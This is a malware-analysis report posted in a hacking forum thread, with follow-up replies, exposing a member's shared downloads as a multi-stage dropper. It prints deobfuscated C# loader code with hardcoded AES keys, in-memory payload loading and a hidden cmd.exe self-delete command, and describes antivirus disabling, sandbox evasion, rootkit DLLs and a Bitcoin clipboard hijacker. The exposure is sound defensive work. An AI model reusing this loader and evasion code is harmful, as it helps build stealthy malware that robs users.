Sinisterly
[Malware Report] - slothic-chan (15 posts) - Printable Version

+- Sinisterly (https://sinister.li)
+-- Forum: Coding (https://sinister.li/Forum-Coding)
+--- Forum: Coding (https://sinister.li/Forum-Coding--71)
+--- Thread: [Malware Report] - slothic-chan (15 posts) (/Thread-Malware-Report-slothic-chan-15-posts)



[Malware Report] - slothic-chan (15 posts) - miso - 10-02-2020

hello, since im not bothered making 15 posts & to prevent spam on the index page, im making this thread. anyway, it took me like 6 hours to make this thread lol, gonna have my breakfast now lol

This thread shows how @slothic has shared a malware via his threads on the Hacking Forum & Cracking Forum.
(the thread sharing the malware are listed down below)

The malware can be present in different ways, but is normally as followed:

The "actual application" actually launches "check.exe", which is a malicious application (the malware is present in the settings folder), the actual application is also in the settings folder
however it will probably miss DLLs needed by the application, or it can even be missing (the actual application is (most of the time) named "database.exe")


List of the threads where the malware has been shared:
Spoiler:


It took a bit of time to do this but i think its a good enough proof to show that @slothic-chan shares malwares with their post by showing the source code of check.exe & Soundhaum.dll (encrypted resource present in check.exe) aswell as showing screenshots.

Extraction patern (started from check.exe):
Code:
check.exe |- Soundhaum.dll   |- Babyt3.exe       |- r77-x64.dll       |- r77-x86.dll       |- babaxv2.exe       |- SnakeLab.exe

check.exe & Soundhaum.dll explanation
Spoiler:
check.exe contains 2 resources, both are encrypted, however, one is decrypted via the actual application (being "Soundhaum", aka Soundhaum.dll) while the other resource needs the "Soundhaum" resource to be decrypted.

when the application is started, the applicationa loads in memory "Soundhaum.dll" which is used for the decryption of the second resource (being "DqdpL8FHbc", aka "Babyt3.exe") which when decrypted, is loaded.

Soundhaum.dll is used as a decryptor & as a self-deleter (meaning that when done, "check.exe" will be closed & deleted.)

Virustotal Scan [31/71] (check.exe)
Virustotal Scan [22/69] (Soundhaum.dll)

Code of check.exe
Spoiler:
Code:
// Deobfuscated code of Rmbo.exe (check.exe) for @slothic-chan malware report by misonothx | deobfuscation by misonothx // Time Taken: ~4:30 hours // // Notes: // |- The order of the instructions might not be correct, no needed instructions were left out // |- The "<Module>" class has been made useless, all crypted strings have already been decrypted using System.IO; using System.Text; using System.Reflection; using System.Security.Cryptography; internal class <Module> // Now unused { public static string Decrypt(string A_0) { bool flag = Assembly.GetExecutingAssembly() != Assembly.GetCallingAssembly(); if (flag) { result = "MindLated.png"; } else { byte[] array = Convert.FromBase64String(A_0); byte[] bytes = new Rfc2898DeriveBytes("p7K95451qB88sZ7J", Encoding.ASCII.GetBytes("2GM23j301t60Z96T")).GetBytes(32); RijndaelManaged rijndaelManaged = new RijndaelManaged { Mode = CipherMode.CBC, Padding = PaddingMode.PKCS7 }; ICryptoTransform transform = rijndaelManaged.CreateDecryptor(bytes, Encoding.ASCII.GetBytes("IzTdhG6S8uwg141S")); MemoryStream memoryStream = new MemoryStream(array); CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Read); byte[] array2 = new byte[array.Length]; int count = cryptoStream.Read(array2, 0, array2.Length); memoryStream.Close(); cryptoStream.Close(); result = Encoding.UTF8.GetString(array2, 0, count).TrimEnd("\0".ToCharArray()); } } } internal class Imagerie { private static void Main(string[] args) // Entrypoint { omg.FoxRiver(54, "ForTheMemes", "Alex", 459871, false, false); } private static bool Shutdown(int a) // Used in obfuscation { return true; } } internal class omg { // Starts of variables public static string Verify = "rebwfyugweyfga" public static byte[] rawAssembly; public static MemoryStream memoryStream = new MemoryStream(); public static bool isTrue = true; // End of variables private static Assembly escobar(string a) // Returns executing assembly { return Assembly.GetExecutingAssembly(); } public static int absoluteTrash(int a) // Uses is unknown { a = a * a + 20; return a * 4; } public static void FoxRiver(int notU, string Lucifer, string test, int U, bool ohcmon, bool fuckIT) // Loads Soundhaum.dll "Effect" function { Assembly assembly = escobar("rsuyefgdhwebfhg"); object o2 = Type.GetType("System.Reflection.Assembly").InvokeMember("Load"), (BindingFlags)256, null, null, new object[] { rawAssembly }); object o = LateBinding.LateGet(o2, null, "GetType"), new object[] { "Soundhaum.haum" }, null, null); object obj = LateBinding.LateGet(o, null, "GetMethod"), new object[] { "Effect" }, null, null); object[] array = new object[2]; object[] array2 = new object[2]; array2[0] = "DqdpL8FHbc"; array2[1] = "Morning"; array[1] = array2; LateBinding.LateCall(obj, null, "Invoke", array, null, null); absoluteTrash(5); VerifySSL(null, assembly.GetManifestResourceStream("Soundhaum"), memoryStream, true); rawAssembly = Xor(memoryStream.ToArray()); memoryStream.Dispose(); Console.WriteLine("try now"); Environment.Exit(0); } public static byte[] Xor(byte[] text) { byte[] array = new byte[text.Length]; array[num3] = (text[num3] ^ bytes[num3 % bytes.Length]); return array; } public static void VerifySSL(byte[] v, Stream a, Stream b, bool isTrue) // Uses is unknown, might be used as a checksum { a.CopyTo(b); } }


Code of Soundhaum.dll
Spoiler:
Code:
// Deobfuscated code of Soundhaum.dll (embedded, decrypted resource from check.exe) for @slothic-chan malware report by misonothx | deobfuscation by misonothx // Time Taken: 15 Minutes public class haum { public static byte[] I987(string resrcName, string asmName) // Decryption { byte[] array2 MemoryStream memoryStream = new MemoryStream(); Assembly.GetEntryAssembly().GetManifestResourceStream(resrcName).CopyTo(memoryStream); array2 = memoryStream.ToArray(); memoryStream.Dispose(); byte[] array = new byte[array2.Length]; byte[] bytes = Encoding.Unicode.GetBytes("xabab"); array[0] = (array2[0] ^ bytes[0 % bytes.Length]); } public static void SelfDelete() { Process.Start(new ProcessStartInfo { Arguments = "/C choice /C Y /N /D Y /T 1 & Del \"" + Assembly.GetEntryAssembly().Location + "\"", // Self-Delete it is indeed WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, FileName = "cmd.exe" }); } public static void Effect(string resrcName, string asmName) // Entrypoint used by check.exe { byte[] rawAssembly = haum.I987(resrcName, asmName); ((MethodInfo)Interaction.CallByName(Thread.GetDomain().Load(rawAssembly), "EntryPoint", CallType.Get, null)).Invoke(0,null); haum.SelfDelete(); } }



Babyt3.exe, r77-x86, r77-x64, SnakeLab.exe & babaxv2.exe explanation
Spoiler:
Babyt3.exe also contains 2 resources, only one of them is encrypted (being "AS4fFe9Dng", aka "babaxv2.exe", "legend78424", aka "SnakeLab.exe" isn't encrypted at all), however there are 2 other files hidden in variables (in base64 format, them being "r77-x64.dll" & "r77-x86.dll")

Babyt3.exe has way more tricks up its sleeve since it checks if it is sandboxed, in a virtual environment, is being scanned via hybrid analysis & is on the desktop (for some reason lmao). it also wants to make sure it is runned as administrator

When executed, it extracts all of its resources aswell as the 2 variables & loads them, it also does a few other things but bascially just sets up the extracted files.

Virustotal Scan [32/69]

[Image: cwxlDdmaVOKhzDmXNBr8X7tld4euR7A2.png]

babaxv2.exe explanation
Spoiler:
babaxv2.exe doesn't contain any resources, all of its malicious stuff is present in its code, no files are extracted.

Virustotal Scan [27/68]

babaxv2.exe also checks if it is running in sandboxie, is in a virtual environment etc... however it now also has code to disable anti-viruses such as AVG, Windows Defender & Malware-Bytes (it also disables task manager, unchecks "Show hidden files" & "Show file extentions" in explorer)

[Image: 5SCBXKIeI7eYc4osrJnetRI1DMZz62Ne.png]

SnakeLab.exe explanation
Spoiler:
SnakeLab.exe doesn't contain any resources, all of its malicious stuff is present in its code, no files are extracted.

SnakeLab.exe is basically a Snake remake, however, the game doesn't start anymore due to the malicious code replacing it for some reason. the only thing it is doing is that it checks your clipboard if it has the pattern of a btc address, if so it replaces it with the address hardcoded in its coded (which is "1LrPUuoopchKbfkJYLEwk2YWqBh6ZakTxX"), it is made so you accidentaly send money to the owner of that BTC address. the application does nothing else.
(babaxv2.exe renames the application to ctfmon.exe & places it in the startup folder)


Virustotal Scan [49/70]

[Image: wTg0HLzeuO0f2I97gNv4WxZpTggoBdmg.png]

r77-x86.dll & r77-x64.dll explanation
Spoiler:
r77-x86.dll & r77-x64.dll doesn't contain any resources, all of its malicious stuff is present in its code, no files are extracted

(the small resume that im doing was based on the Hybrid-Analysis of them, it is very vague since i don't have the best tool for stuff outside of installers & .NET, sorry about that)

for some reason, r77-x86.dll & r77-x64.dll have very different detections rate, the x86 version only has 4 detection while the x64 version has more than 30, same for their respective hybrid-analysis scan. but they're apparently both rootkits and they both get processes & system info.

Hybrid-Analysis (r77-x64.dll)
Virustotal Scan [32/68] (r77-x64.dll)

Hybrid-Analysis (r77-x86, old scan)
Hybrid-Analysis (r77-x86, new scan)
Virustotal Scan [4/65] (r77-x86.dll)



@mothered
@Oni

update: i have seen that he deleted most of the malicious threads while i was making this thread, i don't know if he noticed or got told that they were malicious or got told off by a staff member


RE: [Malware Report] - slothic-chan (15 posts) - mothered - 10-02-2020

I really appreciate the time and effort with your In depth analysis- It hasn't gone unnoticed.

I've been In contact with the said member, who advised that his/her account had been compromised, hence the malicious links. I've asked the member to contact Oni for further clarification.


RE: [Malware Report] - slothic-chan (15 posts) - miso - 10-02-2020

(10-02-2020, 10:47 AM)mothered Wrote: I really appreciate the time and effort with your In depth analysis- It hasn't gone unnoticed.

I've been In contact with the said member, who advised that his/her account had been compromised, hence the malicious links. I've asked the member to contact Oni for further clarification.
would make sence tbh, Oni should then check if there is any differences in IP or anything


RE: [Malware Report] - slothic-chan (15 posts) - mothered - 10-02-2020

(10-02-2020, 10:53 AM)miso Wrote: would make sence tbh, Oni should then check if there is any differences in IP or anything
Correct.


RE: [Malware Report] - slothic-chan (15 posts) - slothic - 10-02-2020

Yeah sorry about that I hadn't realised until yesterday that My account had been hjacked.